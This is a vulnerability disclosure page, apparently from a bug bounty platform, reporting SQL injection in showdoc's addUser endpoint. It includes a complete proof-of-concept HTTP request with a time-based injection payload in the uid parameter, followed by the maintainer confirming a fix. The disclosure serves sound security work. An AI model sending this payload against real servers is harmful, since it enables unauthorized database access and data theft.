SQL Injection in star7th/showdoc

Valid

Reported on

Jan 25th 2022


Description

The uid parameter does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection.

Proof of Concept

Time based:

POST /server/index.php?s=/api/adminUser/addUser HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Cookie: PHPSESSID=c35a50119eee7d09650616215ccc2693; think_language=en-US; cookie_token=248df88efcc25f6b5aef3ad5cf4fd2c145be19155add1c78609427a37f88d267
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: host.com
Connection: Keep-alive

name=laladee&uid=10'+and+1=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))+and+'1'='1&username=laladee

Impact

A successful attack may result the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, write file to server lead to Remote code Execute, or write script to extract data

We are processing your report and will contact the star7th/showdoc team within 24 hours. 4 months ago
laladee submitted a
4 months ago
star7th validated this vulnerability 4 months ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
star7th
4 months ago

Maintainer


I've fixed it. You can check it https://github.com/star7th/showdoc/commit/2b34e267e4186125f99bfa420140634ad45801fb

laladee
4 months ago

Researcher


Yes, I've submitted a patch above :) however the Issue has been resolved.

star7th confirmed that a fix has been merged on 2b34e2 4 months ago
star7th has been awarded the fix bounty
star7th
4 months ago

Maintainer


I found that there was a patch, but I didn't notice it. I fixed all the problems that others fed back before, so I habitually didn't see the patch. Pay attention next time

to join this conversation